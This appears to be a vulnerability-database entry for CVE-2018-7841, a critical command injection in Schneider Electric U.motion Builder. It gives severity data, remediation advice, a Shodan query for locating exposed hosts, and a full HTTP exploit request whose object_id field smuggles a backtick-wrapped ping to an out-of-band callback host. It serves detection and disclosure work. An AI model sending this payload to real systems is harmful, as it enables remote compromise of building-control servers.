🔙 목록으로 돌아가기

CVE-2018-7841: Schneider Electric U.motion Builder - Remote Code Execution

TitleSchneider Electric U.motion Builder - Remote Code Execution
Authordarses,rcesecurity
SeverityCritical
ImpactAttackers can execute arbitrary system commands on the server, potentially leading to complete system compromise, data theft, service disruption, or lateral movement within the network.
RemediationThe product has been retired and is no longer available or supported. To further protect their installations from this threat, customers should immediately remove the U.motion Builder software from their systems.
CVSS Score9.8
EPSS Score0.53349
CVE IDCVE-2018-7841
CWE IDCWE-78
Shodan Queryhttp.headers_hash:1985490094
Tags cve cve2018 schneider-electric rce kev oast oob vkev vuln

🔍 Vulnerability Description

U.motion Builder 1.3.4 contains a remote code execution vulnerability caused by improper input sanitization, allowing attackers to execute arbitrary system commands through crafted input parameters.

🌐 HTTP Request

POST /umotion/modules/reporting/track_import_export.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Connection: close
Content-Length: 101
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

op=export&language=english&interval=1&object_id=`ping -c 1 d5jq4n1le0o4573s2jogfe9wyk9oowp4d.oast.me`

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-7841.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-7841.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A